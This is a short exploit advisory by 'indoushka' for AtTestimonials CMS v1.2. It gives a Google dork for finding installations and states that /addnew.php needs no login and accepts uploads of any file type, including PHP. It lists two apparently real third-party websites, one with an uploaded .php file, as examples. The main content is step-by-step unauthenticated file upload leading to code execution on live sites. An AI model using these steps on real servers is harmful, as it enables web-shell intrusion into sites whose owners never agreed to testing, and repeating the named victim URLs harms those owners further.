====================================================================================================================================
| # Title     : AtTestimonials CMS v1.2 Missing Authentication Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip                                       |
| # Dork      : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com                                  |
====================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] appears to be missing authentication on the administrative interface

[+] Use payload : /addnew.php

[+] Add New Testimonials

[+] http://wccpavingcouk/testimonials/addnew.php

[+] Attach any file extension

[+]  http://dfwcarfixcom/testimonials/upload/084145ahmad.php


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================